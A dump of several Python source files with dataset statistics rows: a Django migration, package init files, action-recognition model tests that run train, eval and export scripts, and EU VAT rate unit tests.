('modified_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='IssueImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('issue_image', imagekit.models.fields.ProcessedImageField(upload_to=apps.api.models.PathAndRename('issue_images'))),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
('issue', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='issue_images', to='api.issue')),
('modified_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='issue',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='issues', to='api.project'),
),
migrations.CreateModel(
name='CommentImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True, verbose_name='Created At')),
('modified_at', models.DateField(auto_now=True, verbose_name='Modified At')),
('comment_image', imagekit.models.fields.ProcessedImageField(upload_to=apps.api.models.PathAndRename('issue_images'))),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comment_images', to='api.comment')),
('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.SET_DEFAULT, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='comment',
name='issue',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.issue'),
),
migrations.AddField(
model_name='comment',
name='modified_by',
field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL),
),
]
| 58.325203 | 186 | 0.608308 | 782 | 7,174 | 5.392583 | 0.14578 | 0.057387 | 0.053118 | 0.083472 | 0.799146 | 0.757173 | 0.730851 | 0.720892 | 0.720892 | 0.720892 | 0 | 0.010993 | 0.239197 | 7,174 | 122 | 187 | 58.803279 | 0.761634 | 0.006273 | 0 | 0.582609 | 1 | 0 | 0.127122 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.078261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
91d09ca86bacf37355a00e0b1404956b64e0cb1c | 31 | py | Python | smilescombine/__init__.py | LiamWilbraham/smilescombine | fa0c4b5ad543dbd4023d7248a10c4fbe2c2ffb0d | [
"MIT"
] | 4 | 2019-01-15T10:21:50.000Z | 2019-08-18T21:01:23.000Z | smilescombine/__init__.py | LiamWilbraham/smilescombine | fa0c4b5ad543dbd4023d7248a10c4fbe2c2ffb0d | [
"MIT"
] | 1 | 2020-07-02T23:05:29.000Z | 2020-08-02T15:35:18.000Z | smilescombine/__init__.py | LiamWilbraham/smilescombine | fa0c4b5ad543dbd4023d7248a10c4fbe2c2ffb0d | [
"MIT"
] | 5 | 2019-07-18T11:50:48.000Z | 2021-07-12T10:46:11.000Z | from .combiner import Combiner
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
37f635214b04ce2a328568e76146e931daba3ad3 | 50 | py | Python | image_keras/supports/dl/__init__.py | tenkeyless/image-keras | 09da179d75bb7a17d76e4fd7456b1667c8b4f62b | [
"MIT"
] | null | null | null | image_keras/supports/dl/__init__.py | tenkeyless/image-keras | 09da179d75bb7a17d76e4fd7456b1667c8b4f62b | [
"MIT"
] | 1 | 2020-06-18T06:47:32.000Z | 2020-06-18T06:47:32.000Z | common_py/dl/__init__.py | tenkeyless/common_py | fae49f038dacecef468a5c0972fdbe0d6a5a66b9 | [
"MIT"
] | null | null | null | from .report import *
from .report_slack import *
| 16.666667 | 27 | 0.76 | 7 | 50 | 5.285714 | 0.571429 | 0.540541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 50 | 2 | 28 | 25 | 0.880952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
532f1990d10135c6762a958c609263b90c3ae08a | 10,636 | py | Python | models/action_recognition_2/tests/common/action_recognition_test_case.py | raymondlo84/training_extensions | dc9f45957648d5f9b9ca58c4e62f80e76f5270e9 | [
"Apache-2.0"
] | null | null | null | models/action_recognition_2/tests/common/action_recognition_test_case.py | raymondlo84/training_extensions | dc9f45957648d5f9b9ca58c4e62f80e76f5270e9 | [
"Apache-2.0"
] | null | null | null | models/action_recognition_2/tests/common/action_recognition_test_case.py | raymondlo84/training_extensions | dc9f45957648d5f9b9ca58c4e62f80e76f5270e9 | [
"Apache-2.0"
] | null | null | null | """
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import os
import unittest
import torch
import yaml
from ote.utils.misc import download_snapshot_if_not_yet, run_through_shell
def collect_accuracy(path):
accuracies = []
content = '/mean_top1_acc:'
with open(path) as input_stream:
for line in input_stream:
candidate = line.strip()
if content in candidate:
accuracies.append(float(candidate.split(' ')[-1]))
return accuracies
def get_dependencies(template_file):
output = {}
with open(template_file) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
for dependency in content['dependencies']:
output[dependency['destination'].split('.')[0]] = dependency['source']
return output
def create_action_recognition_test_case(problem_name, model_name, ann_file, img_root):
class TestCaseOteApi(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.templates_folder = os.environ['MODEL_TEMPLATES']
cls.template_folder = os.path.join(cls.templates_folder, 'action_recognition_2', problem_name, model_name)
cls.template_file = os.path.join(cls.template_folder, 'template.yaml')
cls.ann_file = ann_file
cls.img_root = img_root
cls.dependencies = get_dependencies(cls.template_file)
download_snapshot_if_not_yet(cls.template_file, cls.template_folder)
run_through_shell(
f'cd {cls.template_folder};'
f'pip install -r requirements.txt;'
)
def skip_if_cpu_is_not_supported(self):
with open(self.template_file) as read_file:
training_targets = [x.lower() for x in yaml.load(read_file, yaml.SafeLoader)['training_target']]
if 'cpu' not in training_targets:
self.skipTest('CPU is not supported.')
@unittest.skipUnless(torch.cuda.is_available(), 'No GPU found')
def test_evaluation_on_gpu(self):
run_through_shell(
f'cd {self.template_folder};'
f'python3 eval.py'
f' --test-ann-files {self.ann_file}'
f' --test-data-roots {self.img_root}'
f' --save-metrics-to metrics.yaml'
f' --load-weights snapshot.pth'
)
with open(os.path.join(self.template_folder, "metrics.yaml")) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
est_accuracy = [metrics['value'] for metrics in content['metrics'] if metrics['key'] == 'accuracy'][0]
with open(f'{os.path.dirname(__file__)}/../expected_outputs/{problem_name}/{model_name}.json') as read_file:
content = json.load(read_file)
ref_accuracy = content['accuracy']
self.assertLess(abs(ref_accuracy - 1e-2 * est_accuracy), 1e-6)
def test_evaluation_on_cpu(self):
self.skip_if_cpu_is_not_supported()
run_through_shell(
'export CUDA_VISIBLE_DEVICES=;'
f'cd {self.template_folder};'
f'python3 eval.py'
f' --test-ann-files {self.ann_file}'
f' --test-data-roots {self.img_root}'
f' --save-metrics-to metrics.yaml'
f' --load-weights snapshot.pth'
)
with open(os.path.join(self.template_folder, "metrics.yaml")) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
est_accuracy = [metrics['value'] for metrics in content['metrics'] if metrics['key'] == 'accuracy'][0]
with open(f'{os.path.dirname(__file__)}/../expected_outputs/{problem_name}/{model_name}.json') as read_file:
content = json.load(read_file)
ref_accuracy = content['accuracy']
self.assertLess(abs(ref_accuracy - 1e-2 * est_accuracy), 1e-6)
@unittest.skipUnless(torch.cuda.is_available(), 'No GPU found')
def test_finetuning_on_gpu(self):
log_file = os.path.join(self.template_folder, 'test_finetuning.log')
run_through_shell(
f'cd {self.template_folder};'
f'python3 train.py'
f' --train-ann-files {self.ann_file}'
f' --train-data-roots {self.img_root}'
f' --val-ann-files {self.ann_file}'
f' --val-data-roots {self.img_root}'
f' --load-weights snapshot.pth'
f' --save-checkpoints-to {self.template_folder}'
f' --gpu-num 1'
f' --batch-size 2'
f' --epochs 6'
f' | tee {log_file}')
accuracy = collect_accuracy(log_file)
self.assertGreater(accuracy[-1], 0.0)
def test_finetuning_on_cpu(self):
self.skip_if_cpu_is_not_supported()
log_file = os.path.join(self.template_folder, 'test_finetuning.log')
run_through_shell(
'export CUDA_VISIBLE_DEVICES=;'
f'cd {self.template_folder};'
f'python3 train.py'
f' --train-ann-files {self.ann_file}'
f' --train-data-roots {self.img_root}'
f' --val-ann-files {self.ann_file}'
f' --val-data-roots {self.img_root}'
f' --load-weights snapshot.pth'
f' --save-checkpoints-to {self.template_folder}'
f' --gpu-num 1'
f' --batch-size 2'
f' --epochs 6'
f' | tee {log_file}')
accuracy = collect_accuracy(log_file)
self.assertGreater(accuracy[-1], 0.0)
return TestCaseOteApi
def create_action_recognition_export_test_case(problem_name, model_name, ann_file, img_root):
class ExportTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.templates_folder = os.environ['MODEL_TEMPLATES']
cls.template_folder = os.path.join(cls.templates_folder, 'action_recognition_2', problem_name, model_name)
cls.template_file = os.path.join(cls.template_folder, 'template.yaml')
cls.ann_file = ann_file
cls.img_root = img_root
cls.dependencies = get_dependencies(cls.template_file)
cls.test_export_thr = 1e-2
download_snapshot_if_not_yet(cls.template_file, cls.template_folder)
run_through_shell(
f'cd {cls.template_folder};'
f'pip install -r requirements.txt;'
)
def skip_if_cpu_is_not_supported(self):
with open(self.template_file) as read_file:
training_targets = [x.lower() for x in yaml.load(read_file, yaml.SafeLoader)['training_target']]
if 'cpu' not in training_targets:
self.skipTest('CPU is not supported.')
def do_export(self, folder):
run_through_shell(
f'cd {os.path.dirname(self.template_file)};'
f'pip install -r requirements.txt;'
f'python3 export.py'
f' --load-weights snapshot.pth'
f' --save-model-to {folder}'
)
def export_test_on_gpu(self, thr):
export_folder = 'gpu_export'
if not os.path.exists(export_folder):
self.do_export(export_folder)
export_dir = os.path.join(self.template_folder, export_folder)
run_through_shell(
f'cd {os.path.dirname(self.template_file)};'
f'python3 eval.py'
f' --test-ann-files {ann_file}'
f' --test-data-roots {img_root}'
f' --load-weights {os.path.join(export_dir, "model.bin")}'
f' --save-metrics-to {os.path.join(export_dir, "metrics.yaml")}'
)
with open(os.path.join(export_dir, "metrics.yaml")) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
est_accuracy = [metric['value'] for metric in content['metrics'] if metric['key'] == 'accuracy'][0]
with open(f'{os.path.dirname(__file__)}/../expected_outputs/{problem_name}/{model_name}.json') as read_file:
content = json.load(read_file)
ref_accuracy = content['accuracy']
self.assertGreater(1e-2 * est_accuracy, ref_accuracy - thr)
def export_test_on_cpu(self, thr):
export_folder = 'cpu_export'
if not os.path.exists(export_folder):
self.do_export(export_folder)
export_dir = os.path.join(self.template_folder, export_folder)
run_through_shell(
f'export CUDA_VISIBLE_DEVICES=;'
f'cd {os.path.dirname(self.template_file)};'
f'python3 eval.py'
f' --test-ann-files {ann_file}'
f' --test-data-roots {img_root}'
f' --load-weights {os.path.join(export_dir, "model.bin")}'
f' --save-metrics-to {os.path.join(export_dir, "metrics.yaml")}'
)
with open(os.path.join(export_dir, "metrics.yaml")) as read_file:
content = yaml.load(read_file, yaml.SafeLoader)
est_accuracy = [metric['value'] for metric in content['metrics'] if metric['key'] == 'accuracy'][0]
with open(f'{os.path.dirname(__file__)}/../expected_outputs/{problem_name}/{model_name}.json') as read_file:
content = json.load(read_file)
ref_accuracy = content['accuracy']
self.assertGreater(1e-2 * est_accuracy, ref_accuracy - thr)
@unittest.skipUnless(torch.cuda.is_available(), 'No GPU found')
def test_export_on_gpu(self):
self.export_test_on_gpu(self.test_export_thr)
def test_export_on_cpu(self):
self.skip_if_cpu_is_not_supported()
self.export_test_on_cpu(self.test_export_thr)
return ExportTestCase
| 40.750958 | 120 | 0.596747 | 1,319 | 10,636 | 4.583776 | 0.150114 | 0.02481 | 0.026464 | 0.025306 | 0.798048 | 0.779524 | 0.771254 | 0.765961 | 0.765961 | 0.765961 | 0 | 0.006625 | 0.290429 | 10,636 | 260 | 121 | 40.907692 | 0.794488 | 0.052839 | 0 | 0.734375 | 0 | 0 | 0.25358 | 0.081742 | 0 | 0 | 0 | 0 | 0.03125 | 1 | 0.088542 | false | 0 | 0.03125 | 0 | 0.151042 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7255989dd64b5c650b857ca9a670a259ea51c435 | 26 | py | Python | extract/__init__.py | AndresRubianoM/exportVisualization | 1e2d00542f65f7d45805d1cd5ed44401cb5ebc00 | [
"MIT"
] | null | null | null | extract/__init__.py | AndresRubianoM/exportVisualization | 1e2d00542f65f7d45805d1cd5ed44401cb5ebc00 | [
"MIT"
] | null | null | null | extract/__init__.py | AndresRubianoM/exportVisualization | 1e2d00542f65f7d45805d1cd5ed44401cb5ebc00 | [
"MIT"
] | null | null | null | from .main import dataWits | 26 | 26 | 0.846154 | 4 | 26 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
72a42c91d53a629f37ced63bfb38c7f5b5491953 | 16,531 | py | Python | tests/test_sale_vat_charge.py | jbma/pyvat | 58952f817b0bda38f0594ca8f7baa659ea18ca09 | [
"Apache-2.0"
] | 2 | 2021-10-02T03:16:25.000Z | 2021-12-07T15:12:17.000Z | tests/test_sale_vat_charge.py | jbma/pyvat | 58952f817b0bda38f0594ca8f7baa659ea18ca09 | [
"Apache-2.0"
] | null | null | null | tests/test_sale_vat_charge.py | jbma/pyvat | 58952f817b0bda38f0594ca8f7baa659ea18ca09 | [
"Apache-2.0"
] | null | null | null | import datetime
import pycountry
from decimal import Decimal
from pyvat import (
get_sale_vat_charge,
ItemType,
Party,
VatChargeAction,
)
from pyvat.countries import EU_COUNTRY_CODES
from unittest2 import TestCase
EXPECTED_VAT_RATES = {
'AT': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(10),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'BE': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'BG': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'CY': {
ItemType.generic_physical_good: Decimal(19),
ItemType.generic_electronic_service: Decimal(19),
ItemType.generic_telecommunications_service: Decimal(19),
ItemType.generic_broadcasting_service: Decimal(19),
ItemType.prepaid_broadcasting_service: Decimal(19),
ItemType.ebook: Decimal(19),
ItemType.enewspaper: Decimal(19),
},
'CZ': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'DE': {
ItemType.generic_physical_good: Decimal(19),
ItemType.generic_electronic_service: Decimal(19),
ItemType.generic_telecommunications_service: Decimal(19),
ItemType.generic_broadcasting_service: Decimal(19),
ItemType.prepaid_broadcasting_service: Decimal(19),
ItemType.ebook: Decimal(19),
ItemType.enewspaper: Decimal(19),
},
'DK': {
ItemType.generic_physical_good: Decimal(25),
ItemType.generic_electronic_service: Decimal(25),
ItemType.generic_telecommunications_service: Decimal(25),
ItemType.generic_broadcasting_service: Decimal(25),
ItemType.prepaid_broadcasting_service: Decimal(25),
ItemType.ebook: Decimal(25),
ItemType.enewspaper: Decimal(25),
},
'EE': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'ES': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(4),
ItemType.enewspaper: Decimal(21),
},
'FI': {
ItemType.generic_physical_good: Decimal(24),
ItemType.generic_electronic_service: Decimal(24),
ItemType.generic_telecommunications_service: Decimal(24),
ItemType.generic_broadcasting_service: Decimal(24),
ItemType.prepaid_broadcasting_service: Decimal(24),
ItemType.ebook: Decimal(24),
ItemType.enewspaper: Decimal(24),
},
'FR': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(10),
ItemType.prepaid_broadcasting_service: Decimal(10),
ItemType.ebook: Decimal('5.5'),
ItemType.enewspaper: Decimal('2.1'),
},
'GB': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'GR': {
ItemType.generic_physical_good: Decimal(23),
ItemType.generic_electronic_service: Decimal(23),
ItemType.generic_telecommunications_service: Decimal(23),
ItemType.generic_broadcasting_service: Decimal(23),
ItemType.prepaid_broadcasting_service: Decimal(23),
ItemType.ebook: Decimal(23),
ItemType.enewspaper: Decimal(23),
},
'HR': {
ItemType.generic_physical_good: Decimal(25),
ItemType.generic_electronic_service: Decimal(25),
ItemType.generic_telecommunications_service: Decimal(25),
ItemType.generic_broadcasting_service: Decimal(25),
ItemType.prepaid_broadcasting_service: Decimal(25),
ItemType.ebook: Decimal(25),
ItemType.enewspaper: Decimal(25),
},
'HU': {
ItemType.generic_physical_good: Decimal(27),
ItemType.generic_electronic_service: Decimal(27),
ItemType.generic_telecommunications_service: Decimal(27),
ItemType.generic_broadcasting_service: Decimal(27),
ItemType.prepaid_broadcasting_service: Decimal(27),
ItemType.ebook: Decimal(27),
ItemType.enewspaper: Decimal(27),
},
'IE': {
ItemType.generic_physical_good: Decimal(23),
ItemType.generic_electronic_service: Decimal(23),
ItemType.generic_telecommunications_service: Decimal(23),
ItemType.generic_broadcasting_service: Decimal(23),
ItemType.prepaid_broadcasting_service: Decimal(23),
ItemType.ebook: Decimal(23),
ItemType.enewspaper: Decimal(23),
},
'IT': {
ItemType.generic_physical_good: Decimal(22),
ItemType.generic_electronic_service: Decimal(22),
ItemType.generic_telecommunications_service: Decimal(22),
ItemType.generic_broadcasting_service: Decimal(22),
ItemType.prepaid_broadcasting_service: Decimal(22),
ItemType.ebook: Decimal(22),
ItemType.enewspaper: Decimal(22),
},
'LT': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'LU': {
ItemType.generic_physical_good: Decimal(15),
ItemType.generic_electronic_service: Decimal(15),
ItemType.generic_telecommunications_service: Decimal(15),
ItemType.generic_broadcasting_service: Decimal(3),
ItemType.prepaid_broadcasting_service: Decimal(3),
ItemType.ebook: Decimal(15),
ItemType.enewspaper: Decimal(15),
},
'LV': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'MT': {
ItemType.generic_physical_good: Decimal(18),
ItemType.generic_electronic_service: Decimal(18),
ItemType.generic_telecommunications_service: Decimal(18),
ItemType.generic_broadcasting_service: Decimal(18),
ItemType.prepaid_broadcasting_service: Decimal(18),
ItemType.ebook: Decimal(18),
ItemType.enewspaper: Decimal(18),
},
'NL': {
ItemType.generic_physical_good: Decimal(21),
ItemType.generic_electronic_service: Decimal(21),
ItemType.generic_telecommunications_service: Decimal(21),
ItemType.generic_broadcasting_service: Decimal(21),
ItemType.prepaid_broadcasting_service: Decimal(21),
ItemType.ebook: Decimal(21),
ItemType.enewspaper: Decimal(21),
},
'PL': {
ItemType.generic_physical_good: Decimal(23),
ItemType.generic_electronic_service: Decimal(23),
ItemType.generic_telecommunications_service: Decimal(23),
ItemType.generic_broadcasting_service: Decimal(8),
ItemType.prepaid_broadcasting_service: Decimal(8),
ItemType.ebook: Decimal(23),
ItemType.enewspaper: Decimal(23),
},
'PT': {
ItemType.generic_physical_good: Decimal(23),
ItemType.generic_electronic_service: Decimal(23),
ItemType.generic_telecommunications_service: Decimal(23),
ItemType.generic_broadcasting_service: Decimal(23),
ItemType.prepaid_broadcasting_service: Decimal(23),
ItemType.ebook: Decimal(23),
ItemType.enewspaper: Decimal(23),
},
'RO': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
'SE': {
ItemType.generic_physical_good: Decimal(25),
ItemType.generic_electronic_service: Decimal(25),
ItemType.generic_telecommunications_service: Decimal(25),
ItemType.generic_broadcasting_service: Decimal(25),
ItemType.prepaid_broadcasting_service: Decimal(25),
ItemType.ebook: Decimal(25),
ItemType.enewspaper: Decimal(25),
},
'SI': {
ItemType.generic_physical_good: Decimal(22),
ItemType.generic_electronic_service: Decimal(22),
ItemType.generic_telecommunications_service: Decimal(22),
ItemType.generic_broadcasting_service: Decimal(22),
ItemType.prepaid_broadcasting_service: Decimal(22),
ItemType.ebook: Decimal(22),
ItemType.enewspaper: Decimal(22),
},
'SK': {
ItemType.generic_physical_good: Decimal(20),
ItemType.generic_electronic_service: Decimal(20),
ItemType.generic_telecommunications_service: Decimal(20),
ItemType.generic_broadcasting_service: Decimal(20),
ItemType.prepaid_broadcasting_service: Decimal(20),
ItemType.ebook: Decimal(20),
ItemType.enewspaper: Decimal(20),
},
}
SUPPORTED_ITEM_TYPES = [
ItemType.generic_electronic_service,
ItemType.generic_telecommunications_service,
ItemType.generic_broadcasting_service,
ItemType.prepaid_broadcasting_service,
ItemType.ebook,
ItemType.enewspaper,
]
class GetSaleVatChargeTestCase(TestCase):
"""Test case for :func:`get_sale_vat_charge`.
"""
def test_get_sale_vat_charge(self):
"""get_sale_vat_charge(..)
"""
# EU businesses selling to any type of customer in their own country
# charge VAT.
for seller_cc in EU_COUNTRY_CODES:
for it in SUPPORTED_ITEM_TYPES:
for d in [datetime.date(2014, 12, 15),
datetime.date(2015, 1, 1)]:
for buyer_is_business in [True, False]:
vat_charge = get_sale_vat_charge(
d,
it,
Party(country_code=seller_cc,
is_business=buyer_is_business),
Party(country_code=seller_cc, is_business=True)
)
self.assertEqual(vat_charge.action,
VatChargeAction.charge)
self.assertEqual(vat_charge.rate,
EXPECTED_VAT_RATES[seller_cc][it])
self.assertEqual(vat_charge.country_code,
seller_cc)
# EU businesses selling to businesses in other EU countries apply the
# reverse-charge mechanism.
for seller_cc in EU_COUNTRY_CODES:
for buyer_cc in EU_COUNTRY_CODES:
if seller_cc == buyer_cc:
continue
for it in SUPPORTED_ITEM_TYPES:
for d in [datetime.date(2014, 12, 15),
datetime.date(2015, 1, 1)]:
vat_charge = get_sale_vat_charge(
d,
it,
Party(country_code=buyer_cc, is_business=True),
Party(country_code=seller_cc, is_business=True)
)
self.assertEqual(vat_charge.action,
VatChargeAction.reverse_charge)
self.assertEqual(vat_charge.rate,
Decimal(0))
self.assertEqual(vat_charge.country_code,
buyer_cc)
# EU businesses selling to consumers in other EU countries charge VAT
# in the country in which the consumer resides after January 1st, 2015.
for seller_cc in EU_COUNTRY_CODES:
for buyer_cc in EU_COUNTRY_CODES:
if seller_cc == buyer_cc:
continue
for it in SUPPORTED_ITEM_TYPES:
for d in [datetime.date(2014, 12, 15),
datetime.date(2015, 1, 1)]:
vat_charge = get_sale_vat_charge(
d,
it,
Party(country_code=buyer_cc, is_business=False),
Party(country_code=seller_cc, is_business=True)
)
self.assertEqual(vat_charge.action,
VatChargeAction.charge)
self.assertEqual(
vat_charge.rate,
EXPECTED_VAT_RATES[buyer_cc][it]
if d >= datetime.date(2015, 1, 1) else
EXPECTED_VAT_RATES[seller_cc][it]
)
self.assertEqual(
vat_charge.country_code,
buyer_cc
if d >= datetime.date(2015, 1, 1) else
seller_cc
)
# EU businesses selling to customers outside the EU do not charge VAT.
for seller_cc in EU_COUNTRY_CODES:
for buyer_country in pycountry.countries:
buyer_cc = buyer_country.alpha_2
if buyer_cc in EU_COUNTRY_CODES:
continue
for it in SUPPORTED_ITEM_TYPES:
for d in [datetime.date(2014, 12, 15),
datetime.date(2015, 1, 1)]:
for buyer_is_business in [True, False]:
vat_charge = get_sale_vat_charge(
d,
it,
Party(country_code=buyer_cc,
is_business=buyer_is_business),
Party(country_code=seller_cc, is_business=True)
)
self.assertEqual(vat_charge.action,
VatChargeAction.no_charge)
self.assertEqual(vat_charge.rate, Decimal(0))
| 43.274869 | 79 | 0.620713 | 1,612 | 16,531 | 6.104218 | 0.083747 | 0.175305 | 0.147967 | 0.094309 | 0.889228 | 0.794106 | 0.785874 | 0.785264 | 0.75874 | 0.749594 | 0 | 0.039597 | 0.29115 | 16,531 | 381 | 80 | 43.388451 | 0.800137 | 0.027887 | 0 | 0.611732 | 0 | 0 | 0.003862 | 0 | 0 | 0 | 0 | 0 | 0.030726 | 1 | 0.002793 | false | 0 | 0.01676 | 0 | 0.022346 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
